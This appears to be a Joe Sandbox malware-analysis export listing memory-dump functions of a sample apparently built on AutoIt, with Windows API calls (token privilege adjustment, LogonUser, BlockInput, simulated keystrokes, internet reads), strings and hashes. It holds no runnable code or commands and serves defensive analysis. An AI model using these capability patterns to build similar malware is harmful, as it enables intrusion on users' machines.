                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                        • String ID:
                                                                        • API String ID: 292994002-0
                                                                        • Opcode ID: b207f42ec609aabd349c71224f37a1e6524b5ef45605078d0e462f5143b4bd24
                                                                        • Instruction ID: b254e9080dbe1751c31c06512711b559205ddd2738bacd1bb45fed3b936d5d38
                                                                        • Opcode Fuzzy Hash: b207f42ec609aabd349c71224f37a1e6524b5ef45605078d0e462f5143b4bd24
                                                                        • Instruction Fuzzy Hash: 6711B2323099256FE7219F27DC44B6F77ADEF84762F040429F849E7281CF30994687A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                        • API String ID: 0-1546025612
                                                                        • Opcode ID: 45e67831ad3e356bdd673840fc737bcaa2faeec06a71b0cf22acb51bddec6d29
                                                                        • Instruction ID: 8478407bd24e40e2745c7db24a21fb8ad248cc70c7c237d861eca255f7a8a0c5
                                                                        • Opcode Fuzzy Hash: 45e67831ad3e356bdd673840fc737bcaa2faeec06a71b0cf22acb51bddec6d29
                                                                        • Instruction Fuzzy Hash: 52926CB2A0021ECBDF28CF68C8407BDB7B5FB54314F25819AE95AE7280D7759D81CB91
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0090E014,774D0AE0,0090DEF1,0098DC38,?,?), ref: 0090E02C
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0090E03E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        • Opcode ID: a68d3f956bc5451409357dd54bf5a173f1c2887d40b6839dd9133fe098a0fef3
                                                                        • Instruction ID: 97a5ea589c4b88b958558325cce25fd96584626739e778966fd06e733bf90c8c
                                                                        • Opcode Fuzzy Hash: a68d3f956bc5451409357dd54bf5a173f1c2887d40b6839dd9133fe098a0fef3
                                                                        • Instruction Fuzzy Hash: 15D0A7B141C7129FC7354F64EC0862277F8AF01314F28481AE886D2190D7B4C8C0C790
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009313DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: ($|
                                                                        • API String ID: 1659193697-1631851259
                                                                        • Opcode ID: c47f36273840cc9ef05ebb6257666482cd50bc4a5f03667a8de81e9422bf12a8
                                                                        • Instruction ID: 85398e1ff2ee99966b0e19be9488777c117d1bacbe73f8058a6713511ea810c5
                                                                        • Opcode Fuzzy Hash: c47f36273840cc9ef05ebb6257666482cd50bc4a5f03667a8de81e9422bf12a8
                                                                        • Instruction Fuzzy Hash: 5F321375A006059FCB28CF69D480A6AB7F0FF48320B15C56EE59ADB3A1E770E981CB44
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 0090B22F
                                                                          • Part of subcall function 0090B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0090B5A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Proc$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 2749884682-0
                                                                        • Opcode ID: 18564f444c2479967747e8ed230609850dc7fe2223e34d951c89a98423e55984
                                                                        • Instruction ID: 849c039c9a060fc7eb15bfb8e59b2a0df30305de9047da9494bfbdc9d434b5c1
                                                                        • Opcode Fuzzy Hash: 18564f444c2479967747e8ed230609850dc7fe2223e34d951c89a98423e55984
                                                                        • Instruction Fuzzy Hash: 02A15870118105FEDB28AB2E4C99EBF3A5CEFA6760B504919F812D61E5DB289C01E372
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009443BF,00000000), ref: 00944FA6
                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00944FD2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        • Opcode ID: 8c7acb13b414e0802a1938bff4b17e8d0b6d80d6f3ac74538e9ea3036d941f20
                                                                        • Instruction ID: ab3517bc6539f0bcf5d2da0356a8d35840958d4956d3b8189678aa9dc16dba4a
                                                                        • Opcode Fuzzy Hash: 8c7acb13b414e0802a1938bff4b17e8d0b6d80d6f3ac74538e9ea3036d941f20
                                                                        • Instruction Fuzzy Hash: E141E575604609BFEB20DE84DC81FBFB7BCEB80718F10406AF609A6181EA719E45D6A0
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0093E20D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0093E267
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0093E2B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1682464887-0
                                                                        • Opcode ID: c1e448106b79b81ddc848bf35e8fab69892263fc71319c4cb8aede5bb6994f90
                                                                        • Instruction ID: 8d357881ce942ebc289009d20b7635ab83f3140d9c56d93778e7160baf7f6445
                                                                        • Opcode Fuzzy Hash: c1e448106b79b81ddc848bf35e8fab69892263fc71319c4cb8aede5bb6994f90
                                                                        • Instruction Fuzzy Hash: 67215C35A10218EFDB00EFA5D885AAEBBB8FF88310F0484A9E945E7291DB319945CB50
                                                                        APIs
                                                                          • Part of subcall function 0090F4EA: std::exception::exception.LIBCMT ref: 0090F51E
                                                                          • Part of subcall function 0090F4EA: __CxxThrowException@8.LIBCMT ref: 0090F533
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0092B180
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0092B1AD
                                                                        • GetLastError.KERNEL32 ref: 0092B1BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1922334811-0
                                                                        • Opcode ID: a5159cc4cff6c66a5798248e538b05b86c4c9831d281550d35d8fae140db70b6
                                                                        • Instruction ID: 3b77d9daf08ab6ffcdff7b0c6d1257333f9f76fa739c86b64086a732fbba26eb
                                                                        • Opcode Fuzzy Hash: a5159cc4cff6c66a5798248e538b05b86c4c9831d281550d35d8fae140db70b6
                                                                        • Instruction Fuzzy Hash: BF11BFB2518205AFE7289F54EC95D2BB7FCEF44710B20852EE45A97251DB70FD418A60
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009366AF
                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009366EC
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009366F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                        • String ID:
                                                                        • API String ID: 33631002-0
                                                                        • Opcode ID: ccdb182f75148cda2ed8bc5017308c7ac85115f2f9f238306ca5a9841a1cb9fd
                                                                        • Instruction ID: 27c487dd53f2f2f05f8ed7a950310c6e75a2b3ec9cba83665b873cc8e84449f9
                                                                        • Opcode Fuzzy Hash: ccdb182f75148cda2ed8bc5017308c7ac85115f2f9f238306ca5a9841a1cb9fd
                                                                        • Instruction Fuzzy Hash: 4B11C8B2915228BFE7108BACDC45FAF77BCEB04758F004655F905E7191C2749E048BE1
                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00937223
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0093723A
                                                                        • FreeSid.ADVAPI32(?), ref: 0093724A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: 8587d0ad48a0dc6b17308261bca3dc2a464fe8ae769dffe9f49fd719af1f2265
                                                                        • Instruction ID: 30223eaa1785c5b2e4fdb3e5f8fe61d54d05523dc4221d097541f216a7b5c959
                                                                        • Opcode Fuzzy Hash: 8587d0ad48a0dc6b17308261bca3dc2a464fe8ae769dffe9f49fd719af1f2265
                                                                        • Instruction Fuzzy Hash: 4BF01776A15209FFDF04DFE4DD89EEEBBBCEF08301F105869A606E2191E2709A449B10
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0093F599
                                                                        • FindClose.KERNEL32(00000000), ref: 0093F5C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 2403dc69bcc92a5d519bd3f580fbf75df348b8283a90d09bc4f07330ce28f164
                                                                        • Instruction ID: 77fcb1eba09e2d5cba38ae9161548aa577cd785f4fe54ae45125eb94d70b26b8
                                                                        • Opcode Fuzzy Hash: 2403dc69bcc92a5d519bd3f580fbf75df348b8283a90d09bc4f07330ce28f164
                                                                        • Instruction Fuzzy Hash: FB11AD726046009FD700EF28D849A2EB3E8FF84324F00896EF8A9D7291DB30A9048B81
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0094BE6A,?,?,00000000,?), ref: 0093CEA7
                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0094BE6A,?,?,00000000,?), ref: 0093CEB9
Similarity
• API ID: ErrorFormatLastMessage
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00934153
• keybd_event.USER32(?,7707C0D0,?,00000000), ref: 00934166
Similarity
• API ID: InputSendkeybd_event
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0092ACC0), ref: 0092AB99
• CloseHandle.KERNEL32(?,?,0092ACC0), ref: 0092ABAB
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00916DB3,-0000031A,?,?,00000001), ref: 009181B1
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009181BA
Similarity
• API ID: ExceptionFilterUnhandled
Similarity
• API ID: _memmove
Similarity
• API ID: _memmove
Similarity
• API ID: __itow__swprintf
APIs
• __time64.LIBCMT ref: 0093B6DF
  • Part of subcall function 0091344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0093BDC3,00000000,?,?,?,?,0093BF70,00000000,?), ref: 00913453
  • Part of subcall function 0091344A: __aulldiv.LIBCMT ref: 00913473
Similarity
• API ID: Time$FileSystem__aulldiv__time64
APIs
• BlockInput.USER32(00000001), ref: 00946ACA
Similarity
• API ID: BlockInput
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009374DE
Similarity
• API ID: mouse_event
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0092AD3E), ref: 0092B124
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
Similarity
• API ID: LogonUser
• API String ID: 1244722697-0
Similarity
• API ID: NameUser
• API String ID: 2645101109-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0091818F
Similarity
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
Similarity
• API ID: Exception@8Throwstd::exception::exception
• API String ID: 3728558374-0
APIs
• SetTextColor.GDI32(?,00000000), ref: 0095D2DB
• GetSysColorBrush.USER32(0000000F), ref: 0095D30C
• GetSysColor.USER32(0000000F), ref: 0095D318
• SetBkColor.GDI32(?,000000FF), ref: 0095D332
• SelectObject.GDI32(?,00000000), ref: 0095D341
• InflateRect.USER32(?,000000FF,000000FF), ref: 0095D36C
• GetSysColor.USER32(00000010), ref: 0095D374
• CreateSolidBrush.GDI32(00000000), ref: 0095D37B
• FrameRect.USER32(?,?,00000000), ref: 0095D38A
• DeleteObject.GDI32(00000000), ref: 0095D391
• InflateRect.USER32(?,000000FE,000000FE), ref: 0095D3DC
• FillRect.USER32(?,?,00000000), ref: 0095D40E
• GetWindowLongW.USER32(?,000000F0), ref: 0095D439
  • Part of subcall function 0095D575: GetSysColor.USER32(00000012), ref: 0095D5AE
  • Part of subcall function 0095D575: SetTextColor.GDI32(?,?), ref: 0095D5B2
  • Part of subcall function 0095D575: GetSysColorBrush.USER32(0000000F), ref: 0095D5C8
  • Part of subcall function 0095D575: GetSysColor.USER32(0000000F), ref: 0095D5D3
  • Part of subcall function 0095D575: GetSysColor.USER32(00000011), ref: 0095D5F0
  • Part of subcall function 0095D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095D5FE
  • Part of subcall function 0095D575: SelectObject.GDI32(?,00000000), ref: 0095D60F
  • Part of subcall function 0095D575: SetBkColor.GDI32(?,00000000), ref: 0095D618
  • Part of subcall function 0095D575: SelectObject.GDI32(?,?), ref: 0095D625
  • Part of subcall function 0095D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0095D644
  • Part of subcall function 0095D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095D65B
  • Part of subcall function 0095D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0095D670
  • Part of subcall function 0095D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0095D698
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• API String ID: 3521893082-0
APIs
• DestroyWindow.USER32 ref: 0090B98B
• DeleteObject.GDI32(00000000), ref: 0090B9CD
• DeleteObject.GDI32(00000000), ref: 0090B9D8
• DestroyIcon.USER32(00000000), ref: 0090B9E3
• DestroyWindow.USER32(00000000), ref: 0090B9EE
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0096D2AA
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0096D2E3
• MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0096D711
  • Part of subcall function 0090B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0090B759,?,00000000,?,?,?,?,0090B72B,00000000,?), ref: 0090BA58
• SendMessageW.USER32 ref: 0096D758
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0096D76F
• ImageList_Destroy.COMCTL32(00000000), ref: 0096D785
• ImageList_Destroy.COMCTL32(00000000), ref: 0096D790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                        • String ID: 0
                                                                        • API String ID: 464785882-4108050209
                                                                        • Opcode ID: 48dfa9440b9cd545b1e8b56d76e8dbc428af95196846f9f342a0feb72d271333
                                                                        • Instruction ID: 27e0af9e636d93ec8a513ec09536d7037b0f44480364e60d6019e00d909cf3cc
                                                                        • Opcode Fuzzy Hash: 48dfa9440b9cd545b1e8b56d76e8dbc428af95196846f9f342a0feb72d271333
                                                                        • Instruction Fuzzy Hash: 12128D71A062019FDB11CF28C884BA9B7F9FF45308F144569F9A9DB6A2C731EC81DB91
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0093DBD6
                                                                        • GetDriveTypeW.KERNEL32(?,0098DC54,?,\\.\,0098DC00), ref: 0093DCC3
                                                                        • SetErrorMode.KERNEL32(00000000,0098DC54,?,\\.\,0098DC00), ref: 0093DE29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: c20a826eb632c376ca7f389c829b9260d1ee1792e6f7e327d1b561c587bc80b2
                                                                        • Instruction ID: 1033505cf4687c76da454626bf7fd3e082b0967a2bce9c2369ad65d8767af28c
                                                                        • Opcode Fuzzy Hash: c20a826eb632c376ca7f389c829b9260d1ee1792e6f7e327d1b561c587bc80b2
                                                                        • Instruction Fuzzy Hash: C951D530209306ABC310EF24E8A2939B7A9FBD5708F209819F467D76D1DB70DA45DF92
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-86951937
                                                                        • Opcode ID: 4853ddbcd75c184d6de7f9c4d2948917de27df2e4aed1f6d90045e6ce3a86385
                                                                        • Instruction ID: f5b86b1207ea3884ad30161fa06828aed5a07899e966526cf41045a115a0e98b
                                                                        • Opcode Fuzzy Hash: 4853ddbcd75c184d6de7f9c4d2948917de27df2e4aed1f6d90045e6ce3a86385
                                                                        • Instruction Fuzzy Hash: 0281D33074020DBACB21BB74DD82FBE7768FF95304F048029FA05EA1C6EB61DA51C6A1
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0095C788
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0095C83E
                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 0095C859
                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0095CB15
